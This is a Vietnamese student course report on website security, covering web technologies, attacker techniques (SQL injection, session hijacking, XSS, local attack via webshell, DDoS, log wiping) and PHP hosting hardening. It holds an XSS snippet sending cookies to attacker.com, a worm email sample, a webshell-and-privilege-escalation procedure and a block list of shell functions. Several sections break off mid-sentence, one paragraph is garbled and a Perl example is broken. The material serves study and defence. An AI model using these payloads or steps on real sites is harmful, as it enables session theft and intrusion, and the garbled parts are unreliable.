ĐẠI HỌC QUỐC GIA TP. HCM
TRƯỜNG ĐẠI HỌC KHOA HỌC TỰ NHIÊN
KHOA ĐIỆN TỬ VIỄN THÔNG
ĐỀ TÀI MÔN HỌC “AN NINH MẠNG”
ĐỀ TÀI :
TÌM HIỂU VỀ CÁCH BẢO MẬT
MỘT WEBSITE
GVHD: Thầy VÕ QUANG SƠN
SVTH: NGUYỄN CÔNG MINH 0520043
TÔN VI KIN 0520039
TRẦN HỒ NAM 0520045
PHAN BÁ TUỆ 0520091
TP Hồ Chí Minh – Tháng 11/2008
- 1 -
Tìm hiểu về cách bảo mật một Website – Đồ án môn học “An ninh mạng”
- 2 -
Tìm hiểu về cách bảo mật một Website – Đồ án môn học “An ninh mạng”
Mục lục
MỤC LỤC 1
1. TÌM HIỂU VỀ ỨNG DỤNG WEB 2
1.1 Ứng dụng Web là gì 2
1.2 Domain – Hosting 2
1.3 Web Server 5
1.4 Ngôn ngữ lập trình Web 5
1.5 Các hệ cơ sở dữ liệu 8
2. BẢO MẬT ỨNG DỤNG WEB 10
2.1 Bảo mật là gì 10
2.2 Từ phía người tấn công (Hacker) 12
từ khắp mọi nơi nối lại tạo nên . Khác với cách tổ chức theo các cấp : nội hạt, liên tỉnh, quốc
tế của một mạng viễn thông như mạng thoại chẳng hạn, mạng Internet tổ chức chỉ có một
- 3 -
Tìm hiểu về cách bảo mật một Website – Đồ án môn học “An ninh mạng”
cấp, các mạng máy tính dù nhỏ, dù to khi nối vào Internet đều bình đẳng với nhau. Do cách tổ
chức như vậy nên trên Internet có cấu trúc địa chỉ , cách đánh địa chỉ đặc biệt , rất khác cách
tổ chức địa chỉ của mạng viễn thông.
Địa chỉ Internet (IP) đang được sử dụng hiện tại là (IPv4) có 32 bit chia thành 4 Octet ( mỗi
Octet có 8 bit , tương đương 1 byte ) cách đếm đều từ trái qua phải bít 1 cho đến bít 32, các
Octet tách biệt nhau bằng dấu chấm (.) và biểu hiện ở dạng thập phân đầy đủ là 12 chữ số.
Ví dụ một địa chỉ Internet : 146.123.110.224
(Địa chỉ IP tương lai được sử dụng là IPv6 có 128 bit dài gấp 4 lần của IPv4. Version IPv4 có
khả năng cung cấp 232 = 4 294 967 296 địa chỉ. Còn Version IPv6 có khả năng cung cấp 2
128 địa chỉ ).
Do người sử dụng nhớ được địa chỉ dạng chữ số dài như vậy khi nối mạng là rất khó khăn và
vì thế cạnh địa chỉ IP bao giờ cũng có thêm một cái tên mang một ý nghĩa nào đó, dễ nhớ cho
người sử dụng đi kèm mà trên Internet gọi là Tên Miền. Ví dụ: Máy chủ Web Server của
VDC đang chứa Báo Quê hương có địa chỉ là 203.162.000.012 , tên Miền của nó là
home.vnn.vn . Thực tế người sử dụng không cần biết đến địa chỉ IP mà chỉ cần nhớ tên Miền
là truy nhập được.
Vậy tên Miền là một danh từ dịch theo kiểu nghĩa của từng từ một (Word by Word) từ tiếng
anh (Domain name). Thực chất tên miền là sự nhận dạng vị trí của một máy tính trên mạng
Internet nói cách khác tên miền là tên của các mạng lưới, tên của các máy chủ trên mạng
Internet.
Do tính chất chỉ có 1 và 1 duy nhất trên Internet, ta không thể đăng ký được Domain name
khi mà người khác đã là chủ sở hữu
Cấu tạo của tên miền
Tên miền bao gồm nhiều thành phần cấu tạo nên cách nhau bởi dấu chấm (.) ví dụ
home.vnn.vn là tên miền máy chủ Web của VDC. Thành phần thứ nhất "home" là tên của
máy chủ , thành phần thứ hai "vnn" thường gọi là tên miền mức hai (second domain name
Được coi là các tên miền cấp cao nhất. Các tên miền cấp cao nhất thể hiện sự chuyên nghiệp
và uy tín trong kinh doanh trên Internet của các doanh nghiệp.
Domain name thứ cấp
Là tất cả những loại Domain name còn lại mà domain đó phải phụ thuộc vào một Domain
name cấp cao nhất. Để đăng ký các Domain name kiểu này, thông thường bạn phải liên hệ
trực tiếp với người quản lý Domain name cấp cao nhất.
Ví dụ:
http://demo.vnnetsoft.com
http://home.vnn.vn
Được coi là những tên miền thứ cấp.
Web –Hosting:
- 5 -
Tìm hiểu về cách bảo mật một Website – Đồ án môn học “An ninh mạng”
Web Hosting là nơi lưu trữ tất cả các trang Web, các thông tin, tư liệu, hình ảnh của Website
trên một máy chủ Internet, Web Hosting đồng thời cũng là nơi diễn ra tất cả các hoạt động
giao dịch, trao đổi thông tin giữa Website với người sử dụng Internet và hỗ trợ các phần mềm
Internet hoạt động. Nói một cách đơn giản, Web Hosting tương đương với trụ sở làm việc của
một doanh nghiệp trong đời thường
Các yêu cầu và tính năng của Web Hosting?
• Web Hosting phải có một dung lượng đủ lớn (tính theo MBytes) để lưu giữ được
đầy đủ các thông tin, dữ liệu, hình ảnh, của Website
• Phải hỗ trợ truy xuất máy chủ bằng giao thức FTP để cập nhật thông tin
• Phải có bandwidth (băng thông) đủ lớn để phục vụ các hoạt động giao dịch, trao
đổi thông tin của Website
• Hỗ trợ các công cụ lập trình phần mềm trên Internet và các công cụ viết sẵn để
phục vụ các hoạt động giao dịch trên Website như gửi mail, upload qua trang
Web,
• Hỗ trợ đầy đủ các dịch vụ E-mail như POP3 E-mail, E-mail Forwarding,
1.3 Web Server:
Web Server là máy chủ có dung lượng lớn, tốc độ cao, được dùng để lưu trữ thông tin như
đọc tài liệu của ông.dần dẩn người ta thích đoạn cript này và bác đầu san xuất một gói công
cụ mang ten personal home pages dó là tên đầu tiên của php
Ông đã viết một số cơ chế nhúng kết hợp với các công cụ khác để phân tích các biểu
mẩu html hay phiên dịch biểu mẫu và dạc tên là PHP2 được gọi là PHP/FI. PHP/FI vào năm
1995
Nhóm phát triển rasmus lerdorf , andigutmans, Zeev suraski đã loại bỏ những điểm
yếu của php2 và thêm một số hàm API cho phép các lập trình viên khác bổ xung những tính
năng của ngôn ngử để viết những module cho nó .vào tháng 11/1997 phiên bản php3 ra đời
Cuối năm 1998, PHP đã có khoảng 10 triệu người sử dụng và hàng trăm triệu Website
đã báo cáo là có sử dụng PHP
Vào năm 1999 phiên bản php4 đã ra dới vói tính năng nỗi trội.hỗ trợ nhiều web
server mới phiên http
1.4.2 HTML (HyperText Markup Language):
Đây là một ngôn ngữ đơn giản được sử dụng trong các tài liệu siêu văn bản nó chỉ là
các tài liệu văn bản bình thường nhưng có chứa các thành phần đặc biệt gọi là các thẻ (hoặc
các cặp thẻ) đánh dấu. Dựa theo các cặp thẻ này mà trình duyệt có thể biết được nó phải thực
hiện cái gì
Ví dụ đơn giản:
Hãy lấy một ví dụ đơn giản như sau:
<B>Xin chào, tôi là LGVT</B>
Các bạn chú ý: dòng chữ Xin chào, tôi là LGVT được đặt trong cặp chữ "<B>" và
"</B>" Cặp chữ này chính là ký hiệu của một cặp thẻ trong ngôn ngữ HTML, mà khi
biên dịch ra, trình duyệt sẽ hiểu là: Khi gặp thẻ "<B>", nó phải có trách nhiệm in tất
cả các chữ sau đó thành chữ đậm cho đến khi gặp thẻ "</B>".
Trong HTML, các thẻ có thể tồn tại đơn lẻ, hoặc tồntại dưới dạng một cặp thẻ. Nếu
tồn tại dưới dạng 1 cặp thì thẻ bắt đầu gọi là thẻ mở và thẻ kết thúc gọi là thẻ đóng
Để soạn thảo một file HTML, chúng ta có thể sử dụng bất kỳ trình soạn thảo nào,
chẳng hạn như NotePad hay thậm chí Turbo Pascal cũng được. miễn là sau đó các bạn Save
As dưới dạng đuôi *.htm
Cấu trúc của 1 thẻ trong HTML bao gồm:
Một tài liệu XML có thể được chia thành hai phần chính, mỗi phần có thể có các thành
phần theo quy định khác nhau:
- Phần Prolog: Chứa các khai báo cho tài liệu XML. Phần này có thể chứa các định đạng
như: Các chỉ thị xử lý, định nghĩa kiểu cho tài liệu, chú thích, phiên bản đang sử dụng, cách
thức mã hóa dữ liệu, báo cáo các chỉ thị xử lý cho ứng dụng.
- Phần thân chứa nội dung dữ liệu, bao gồm một hay nhiều phần tử, mỗi phần tử được
chứa trong một cặp thẻ. Phần tử đầu tiên của tài liệu được gọi là phần tử gốc (root element).
Một tài liệu XML được coi là hợp khuôn dạng (well-form) nếu nó tuân thủ các quy tắc
sau:
- 8 -
Tìm hiểu về cách bảo mật một Website – Đồ án môn học “An ninh mạng”
• Các khai báo XML cần được đặt tại dòng đầu tiên của tài liệu, chẳng hạn như khai báo
phiên bản hay các chỉ thị xử lý XML.
• Mỗi tài liệu XML chỉ có một thành phần gốc (root) chứa mọi thành phần khác trong tài
liệu. Các thành phần có thể đứng trước phần tử gốc là chú thích, chỉ thị xử lý và định nghĩa
DTD (nếu khai báo ở phần khởi đầu của tài liệu).
• Mỗi phần tử của tài liệu phải được nằm trong một cặp thẻ. Nếu là phần tử rỗng thì thẻ
phải được kết thúc bằng "/>". Ví dụ: "<image/>"
• Các thành phần trong tài liệu XML, khác thành phần gốc đều nằm giữa cặp thẻ gốc và
phải lồng nhau một cách hợp lý, tức là không có thành phần phủ, tập hợp thẻ này không được
phép chồng lên thẻ kia, mỗi tập trong phải nằm trong tập hợp lớn hơn kế tiếp.
• Các cặp thẻ phải được viết chính xác như nhau kể cả chữ hoa hay chữ thường.
• Các giá trị của các thuộc tính đều phải nằm giữa hai ngoặc kép. Ví dụ: hide=true là
không hợp lệ, mà phải là hide="true".
1.4.4 ASP (active server pages)
Vào những thập niên 90 một Kì thuật mới của microsoft là kết hợp html với các đoạn
script, các thanh phần sử lí server trên cùng 1 file được gọi là ASP
Về bản chất, ta có thể coi ASP như là một ngôn ngữ thông dịch vậy. Một trang ASP
có thể sử dụng HTML, JScript và VBScript. Qua các đoạn mã nhúng này, ASP có thể truy
cập đến các thành phần phía server. Các thành phần này có thể được viết trên bất kỳ ngôn
JavaScript có thể được sử dụng trong tập tin PDF của Adobe Acrobat và Adobe Reader
JavaScript là một ngôn ngữ lập trình dựa trên nguyên mẫu với cú pháp phát triển từ C
1.5 Các hệ cơ sở dử liệu:
Cơ sở dử liệu là một hệ thống tập hợp của các tập tin dược thiết kế nhầm giảm thiểu
việc lập lại dử liệu
Các tập tin trong cơ sở dử liệu là một thành phần của một bộ chương trình nhằm tạo
lập quản lí và truy xuất các tập tin cơ sở dử liệu
Hệ quản trị cơ sở dử liệu (database managements system ) viết tắc là DBMS là bộ
phần mềm của những công cụ có sẳn do một số nhà sản xuất phần mềm cung cấp
1.5.1 My SQL:
MySQL là một phần mềm quản trị CSDL mã nguồn mở, miễn phí nằm trong nhóm
LAMP (Linux - Apache -MySQL - PHP)
Một số đặc điểm của MySQL
MySQL là một phần mềm quản trị CSDL dạng server-based (gần tương đương với SQL
Server của Microsoft).
MySQL quản lý dữ liệu thông qua các CSDL, mỗi CSDL có thể có nhiều bảng quan hệ chứa
dữ liệu.
MySQL có cơ chế phân quyền người sử dụng riêng, mỗi người dùng có thể được quản lý
một hoặc nhiều CSDL khác nhau, mỗi người dùng có một tên truy cập (user name) và mật
khẩu tương ứng để truy xuất đến CSDL.
Khi ta truy vấn tới CSDL MySQL, ta phải cung cấp tên truy cập và mật khẩu của tài
khỏan có quyền sử dụng CSDL đó. Nếu không, chúng ta sẽ không làm được gì cả.
1.5.2 SQL :
Mô hình cơ sở dữ liệu (CSDL) quan hệ - RDBMS, do E.F Codd đưa ra vào đầu thập
kỷ 70. Từ đó đến nay, nó liên tục phát triển trở thành mô hình CSDL phổ biến bậc nhất. Mô
hình quan hệ gồm các thành phần sau:
Tập hợp các đối tượng và / hoặc các mối quan hệ
Tập hợp các xử lý tác động tới các quan hệ
Ràng buộc dữ liệu đảm bảo tính chính xác và nhất quán.
SQL (Structured Query Language, đọc là "sequel") là tập lệnh truy xuất CSDL quan
Internet rẻ tiền và tốc độ ngày một nhanh hơn thì việc bảo mật hệ thống là một vấn đề hết sức
hữu ích. Bảo mật là một đòi hỏi thiết yếu bởi vì những máy tính mang tính toàn cầu đang
ngày càng trở nên kém an toàn. Thử tưởng tượng một gói dữ liệu khi di chuyển từ điểm A
sang điểm B, gói dữ liệu này có thể đi qua nhiều điểm trên mạng và nếu như tại một máy nào
- 11 -
Tìm hiểu về cách bảo mật một Website – Đồ án môn học “An ninh mạng”
đó người sử dụng có thể lấy thông tin trên gói dữ liệu này và biết các thông tin chi tiết của
máy gửi, họ có thể sử dụng các kỹ thuật cao để truy nhập bất hợp pháp vào máy gửi và có thể
phá hỏng máy này hoặc toàn bộ hệ thống tùy theo mức độ thao tác. Những thao tác mà các
người sử dụng bất hợp pháp này có thể làm trên hệ thống là ăn cắp thông tin hệ thống, từ chối
các dịch vụ sử dụng trên hệ thống.
Mục đích của việc bảo mật là thông báo cho người sử dụng, phòng ban trong hệ thống biết
các vấn đề về việc bảo vệ thông tin và kỹ thuật của họ. Các luật bảo mật cũng chỉ dẫn cho họ
biết thông tin về các máy mà họ có thể gặp trong đường mạng.
Trước hết phải nhận ra một điều là không có một hệ thống nào là hoàn toàn bảo mật tuyệt
đối. Tất cả những gì mà nhà quản trị có thể làm là tăng thêm sự khó khăn cho người dùng khi
họ có ý định thâm nhập hệ thống. Nhà quản trị hệ thống cần phải quyết định sự cân bằng giữa
các mục đích, ý định sử dụng của hệ thống. Cần phải quyết định mức độ bảo mật cần thiết
cho hệ thống của mình.
Đối với các nhà cung cấp sản phẩm thì mục tiêu của họ là cung cấp càng nhiều các dịch vụ
càng tốt, đơn giản hóa các việc sử dụng dịch vụ trong hệ thống, và nói chung là tất cả những
gì mà họ có thể làm để cho sản phẩm có thể tiêu thụ nhiều. Việc này vô hình chung đã làm
cho nhà quản trị hệ thống trở nên phức tạp hơn. Bởi vì các dịch vụ đa dạng má các nhà cung
cấp phát triển có thể trở thành cổng sau cho các cracker có thể thâm nhập hệ thống.
Như vậy, có thể mô tả sự tác động của việc này đối với các nhà quản trị như sau :
+ Các dịch vụ chống lại các vấn đề bảo mật : như đã nói ở trên thì các dịch vụ mà các nhà
cung cấp sản phẩm phát triển có thể cho phép người dùng sở hữu các nguồn tài nguyên trên
hệ thống và dĩ nhiên là điều này hoàn toàn không đòi hỏi một chứng thực nào cả. Đây là một
việc hết sức nguy hiểm cho hệ thống và nhiệm vụ của nhà quản trị là cần phải quyết định hạn
chế các dịch vụ cần thiết trong hệ thống hơn là bảo mật cho các dịch vụ này.
-Các cổng và dịch vụ tương ứng đang mở trên Server
- Số lượt truy cập, băng thông hàng tháng của Website
*Khảo sát ứng dụng Web: bước tiếp theo là tập trung nghiên cứu Website
-Website sử dụng ứng dụng Web nào?
-Mã nguồn mở hay đóng? Phiên bản?
-Nếu là mã nguồn mở thì download source code về để phân tích và kiểm tra, tìm đọc các
thông tin về bug và exploit từ trang chủ của sản phẩm
- 14 -
Tìm hiểu về cách bảo mật một Website – Đồ án môn học “An ninh mạng”
*Dò tìm lỗi:
Dò tìm lỗi tự động: Dùng các công cụ quét và dò lỗi Website như Scrawlr, MaxQ, Selenium,
Acunetix Web Vulnerability Scanner, …
Giao diện của Acunetix Web Vulnerability Scanner
Dò tìm lỗi bằng tay:
Vận dụng các kiến thức lập trình, hệ điều hành, bảo mật và mạng máy tính, như một “người
dùng tinh nghịch” hacker tiến hành các thao tác dò lỗi trực tiếp ngay trên website, nhất là ở
phần nhập dữ liệu đầu vào.
*Khai thác lỗi để tấn công: Đây là giai đoạn quan trọng nhất để có thể phá hoại hoặc chiếm
quyền điều khiển được Website
Một vài cách thức tấn công phổ biến
-SQL Injections
-Session Hijacking
- Local Attack
-Dùng các loại trojan, virus đánh cắp mật khẩu admin
-DoS và DDoS
+SQL Injections
- 15 -
Tìm hiểu về cách bảo mật một Website – Đồ án môn học “An ninh mạng”
Khi tri n khai các ng d ng web trên Internet, nhi u ng i v n ngh r ng vi c m b o an toàn, ể ứ ụ ề ườ ẫ ĩ ằ ệ đả ả
b o m t nh m gi m thi u t i a kh n ng b t n công t các tin t c ch n thu n t p trung vào ả ậ ằ ả ể ố đ ả ă ị ấ ừ ặ ỉ đơ ầ ậ
HTTP là một giao thức có tính stateless cho nên, thông tin giữa client (trình duyệt) và server
(web server) thường được kết thúc càng nhanh càng tốt và connection này sẽ được tắt bỏ sau
khi quy trình chuyển gởi thông tin hoàn tất. Vì vậy, Session đã được tạo không được kiểm tra
còn tồn tại hay không, cho đến khi user bấm vào nút logout, xóa bỏ cookies. Trừ phi web
server kiểm tra xem Session này còn sống hay không sau một khoảng thời gian định sẳn,
- 16 -
Tìm hiểu về cách bảo mật một Website – Đồ án môn học “An ninh mạng”
pingsession của HVA là một ví dụ.
Sự cần thiết của Session ID: Hãy tưởng tượng bạn vào một website nào đó, VNDEV chẳng
hạn, bạn đăng nhập thành công. Nhưng mỗi lần muốn trả lời một bài nào đó, bạn phải đăng
nhập lại, rất bất tiện. Session ID sinh ra để khắc phục sự bất tiện đó. Với một session ID tạo
ra riêng cho một user khi kết nối tới một website nào đó, web server dựa vào session ID để
nhận ra user, và chấp nhận cho user này thực hiện các hành động mà user được quyền mà
không phải xác nhận lần này qua lần khác.
Một ít về cookies: Có nhiều loại cookies, nhưng có 2 loại bạn cần tìm hiểu là persistent
cookies và non-persistent cookies
-Persistent cookies là loại cookies vẫn tồn tại khi bạn tắt trình duyệt. Khi bạn chọn remember
me, thì non-persistent cookies trở thành Persistent cookies
-Non-Persistent cookies thì ngược lại, trình duyệt tắt, cookies hết hiệu lực, và dĩ nhiên
session ID cũng đi theo. Non-persistent cookies còn được gọi nôm na là session cookies
(cookies theo phiên làm việc)
+ XSS (Cross- Site Scripting)
1. XSS là gì ?
Cross-Site Scripting hay còn được gọi tắt là XSS (thay vì gọi tắt là CSS để tránh nhầm lẫn
với CSS-Cascading Style Sheet của HTML) là một kỹ thuật tấn công bằng cách chèn vào các
website động (ASP, PHP, CGI, JSP ) những thẻ HTML hay những đoạn mã script nguy
hiểm có thể gây nguy hại cho những người sử dụng khác. Trong đó, những đoạn mã nguy
hiểm đựơc chèn vào hầu hết được viết bằng các Client-Site Script như JavaScript, JScript,
DHTML và cũng có thể là cả các thẻ HTML.
Kỹ thuật tấn công XSS đã nhanh chóng trở thành một trong những lỗi phổ biến nhất của Web
IMG và IFRAME có thể cho phép trình duyệt của bạn load thêm các website khác khi các
lệnh HTML được hiển thị. Ví dụ như BadTrans Worm một loại worm sử dụng thẻ IFRAME
để lây lan trong các hệ thống có sử dụng Outlook hay Outlook Express:
====_ABC1234567890DEF_====
Content-Type: multipart/alternative;
boundary="====_ABC0987654321DEF_===="
====_ABC0987654321DEF_====
Content-Type: text/html;
charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable
<HTML><HEAD></HEAD><BODY bgColor=3D#ffffff>
<iframe src=3Dcid:EA4DMGBP9p height=3D0 width=3D0>
</iframe></BODY></HTML>
====_ABC0987654321DEF_====
====_ABC1234567890DEF_====
Content-Type: audio/x-wav;
name="filename.ext.ext"
Content-Transfer-Encoding: base64
Content-ID: <EA4DMGBP9p>
Đôi khi đang đọc thư bạn bị chuyển sang một website khác, bạn có nghĩ rằng bạn có thể mất
mật khẩu. Trước đây, hàng loạt các hộp thư của Yahoo bị mất mật khẩu hay bị đọc trộm thư
mà không rõ nguyên nhân. Có lẽ khi đó các bạn mở các bức thư mà không hề cảnh giác với
XSS, đâu phải chỉ các file đính kèm mới có thể gây nguy hiểm cho bạn. Chỉ cần với một đoạn
mã HTML gửi trong thư bạn đã hoàn toàn bị mất cookie của mình:
- 18 -
Tìm hiểu về cách bảo mật một Website – Đồ án môn học “An ninh mạng”
<form action="http://attacker.com/save.asp" method="post" name="XSS">
<input type="hidden" name="cookie">
</form>
<img border="0" onmouseover="window.document.XSS.cookie.value = document.cookie;
thì bạn không thể áp dụng phương pháp trên. Trong trường hợp này bạn cần đến các chương
trình scanner tự động. Nếu như bạn sử dụng trong môi trường Windows bạn có thể dùng N-
Stealth hay AppScan, đó là những chương trình scan khá tuyệt, bạn không chỉ kiểm tra được
các lỗi XSS mà nó còn cho phép bạn kiểm tra các lỗi khác trong Website đó, Server đó.
Tất nhiên đâu phải lúc nào bạn cũng cần kiểm tra tất cả, nếu như bạn chỉ muốn kiểm tra các
lỗi XSS có trong website, bạn chỉ cần sử dụng screamingCSS. Đó là một Perl Script sẽ mở
- 19 -
Tìm hiểu về cách bảo mật một Website – Đồ án môn học “An ninh mạng”
các kết nối tới website (sử dụng Perl's socket) để kiểm tra các lỗi XSS của bạn. Hơn nữa bạn
có thể sử dụng nó trong cả môi trường Unix lẫn Windows.
5. Ngăn ngừa XSS như thế nào ?
Người ta không lường hết được mức độ nguy hiểm của XSS nhưng cũng không quá khó khăn
để ngăn ngừa XSS. Có rất nhiều cách để có thể giải quyết vấn đề này.
OWASP (The Open Web Application Standard Project) nói rằng để có thể xây dựng các
website bảo mật cao, đối với các dữ liệu của người sử dụng bạn nên
+ Chỉ chấp nhận những dữ liệu hợp lệ.
+ Từ chối nhận các dữ liệu hỏng.
+ Liên tục kiểm tra và thanh lọc sữ liệu.
Tuy nhiên trên thực tế, một số trường hợp bạn phải chấp nhận mọi loại dữ liệu hay không có
một bộ lọc phù hợp. Chính vì vậy bạn phải có những cách riêng để giải quyết.
Một trong những cách hay sử dụng là bạn mã hoá các kí tự đặc biệt trước khi in ra website,
nhất là những gì có thể gây nguy hiểm cho người sử dụng. Trong trường hợp này thẻ <script>
sẽ được đổi thành <script>. Như vậy nó sẽ vẫn được in ra màn hình mà không hề gây nguy
hiểm cho người sử dụng.
Tôi lấy ví dụ với script search.cgi với mã nguồn là
#!/usr/bin/perl
use CGI;
my $cgi = CGI->new();
my $query = $cgi->param('query');
print $cgi->header();
$r->print("You entered ", $text);
Kỹ thuật XSS được mô tả lần đầu tiên cách đây 2 năm và hầu hết các khả năng tiềm ẩn của
kỹ thuật này đã được biết đến. Tuy nhiên chúng ta mới chỉ khắc phục được một phần của nó.
Không phải vô tình mà Yahoo Mail lại để sót một lỗi XSS trong bộ lọc của mình. Một
phương pháp tối ưu vẫn còn đang ở phía trước.
+Local Attack
Local Attack, tấn công nội bộ từ bên trong, là một khái niệm xuất hiện từ khi các máy chủ
mạnh lên trong thời gian gần đây, để hiểu rõ khái niệm, chúng ta sẽ lấy một số ví dụ.
Vào thập niên trước, các máy chủ chạy web(web server) có cấu hình chỉ ở mức trung bình và
chỉ có thể đảm nhiệm việc gồng gánh một hoặc 2,3 trang web cùng tồn tại. Theo thời gian,
cấu hình các máy chủ ngày càng mạnh hơn, tốc độ bộ vi xử lý và các công nghệ phân luồng,
đa nhân, xử lý song song; đồng bộ với sự phát triển của phần cứng là phần mềm hệ thống và
web server software ngày càng được viết chuyên biệt để xử lý đa tác vụ. Chính nhờ sự phát
triển đó, một máy chủ ngày nay(có thể là chiếc PC của bạn) có thể đặt được nhiều website
trên đó, ví dụ như PC của bạn có thể đặt 3 trang web: của lớp bạn, của bạn gái bạn và 1 blog
của bạn. Và cũng chính nhờ vậy, mà 1 công nghệ khai thác lỗi mới ra đời? Nó mang tên local
attack -tấn công từ nội bộ.
Bước 1: Xác định các website cần tấn công
Bước 2: Xác định các website đặt cùng server với mục tiêu
Bước 3: Tìm cách khai thác một trong các website đặt chung server với mục tiêu . Khai thác
được 1 trong số các website đó .Tìm cách upload webshell hoặc thực thi shell code .
Bước 4:Thành công có webshell, kiểm tra quyền của user hiện tại
- 21 -
Tìm hiểu về cách bảo mật một Website – Đồ án môn học “An ninh mạng”
Bước 5: Nếu quyền hiện tại đủ đến tấn công mục tiêu. Sang bước 7
Bước 6: Nếu quyền hiện tại không đủ tấn công, tìm cách nâng quyền lên
Bước 7:Đã có đủ quyền, tiến hành đọc file config, tìm user password, deface mục tiêu nếu có
thể
Bước 8:Kết thúc
+ Dùng các loại trojan, virus
DRDoS có thể được mô tả như sau :
Hacker sẽ điều khiển Spoof SYN generator, gửi SYN packet đến tất cả các TCP Server lớn,
lúc này các TCP Server này vô tình thành Zombie cho Hacker để cùng tấn công Victim và
làm nghẽn đường truyền của Victim.
+ Xóa dấu vết
Bước cuối cùng đó là xóa các dấu vết còn lưu lại trên server cũng như phía Client trước khi
thoát ra (các file log, địa chỉ IP, phiên làm việc, cache,, history, …)
2.2 Từ phía người phòng thủ (Administrator)
Ngày nay các ứng dụng web với mã nguồn mở phát triển rất mạnh, trong đó đặc biệt phổ biến
là PHP – MySQL. Nhưng công nghệ phát triển đồng thời kéo theo những “tin tặc” trẻ luôn
muốn khẳng định mình sau khi xem những hướng dẫn tấn công, khai thác lỗi đầy rẫy trên các
- 23 -
Tìm hiểu về cách bảo mật một Website – Đồ án môn học “An ninh mạng”
forum hacker. Vì thế bất kì một website nào cũng có khả năng bị tấn công bất cứ lúc nào, đặc
biệt là các site cá nhân, tập thể vừa và nhỏ sẽ chọn giải pháp là thuê shared hosting trên một
server. Vì các shared hosting ở cùng server nên độ riêng tư không cao, việc kiên cố hoá
website trên shared hosting là rất cần thiết.
Shared hosting là gì ?
Ta vẫn quen gọi ngắn shared hosting là host, vì hầu hết các site đều thuê dịch vụ hosting để
tiết kiệm chi phí, ngoại trừ một số site yêu cầu tài nguyên lớn và độ bảo mật cao mới sử dụng
server riêng.
1. Phân quyền hợp lí
A. Tìm hiểu về chmod:
Là sự phân quyền truy cập vào một file hay một folder đối với các lớp người dùng giống như
các thuộc tính dùng lệnh attrib trong DOS.
Các lớp người dùng gồm có: Owner – Group – World
Owner : người “sở hữu” host.
Group : là nhóm người dùng.
World : bất kì ai.Các quyền khi chmod:
Read : đọc (r = 4)
Để khắc phục điểm này, ta nên yêu cầu bên cung cấp hosting tạo host không có domain (tên
miền) chính và để ta tự gắn vào bằng chức năng add-on domain. Khi add domain sẽ có chỗ để
bạn nhập đường dẫn đến thư mục mà domain sau khi gắn thành công sẽ trỏ vào như hình2.
VD: /public_html/foder1/folder2/folder3/forum/
Sau khi bạn bấm add các thư mục folder1, folder2, …, forum sẽ được tự động tạo ra. Và bây
giờ bạn áp dụng cách chmod ở trên để chmod các thư mục folder1, folder2 … để giấu đường
dẫn của site trên server.
3. Không hiển thị lỗi nếu phát sinh
Khi có lỗi phát sinh, PHP sẽ hiện thông báo ra trình duyệt và chỉ rõ lỗi ở file nào, dòng nào
và đường dẫn của file, vì thế điều này rất nguy hiểm.
Để che lỗi, bạn tạo một file php.ini với nội dung như sau:
display_errors = Off
log_errors = On
Sau đó upload lên thư mục chứa website.
Gợi ý: bạn nên up file php.ini trên vào các thư mục mà người dùng sẽ truy cập bằng trình
duyệt, thường là thư mục chứa website, thư mục quản trị, thư mục của user …
4. Bật safe-mode (chế độ an toàn) và vô hiệu các hàm nguy hiểm
Thêm hoặc edit 2 dòng sau trong nội dung file php.ini
disable_functions = passthru, system, shell_exec, exec, dir, readfile, virtual, proc_terminate
safe-mode = on
Lưu ý: bạn có thể bỏ bớt các hàm trong danh sách hàm bị vô hiệu nếu hàm đó cần cho
website của bạn hoạt động.
5. Phân quyền account truy cập cơ sở dữ liệu MySQL
Khi bạn tạo user truy cập vào database, bạn cần lưu ý:
Không dùng user và pass của host làm user của database.
Không cấp quyền DROP như hình 3.
- 25 -
Tìm hiểu về cách bảo mật một Website – Đồ án môn học “An ninh mạng”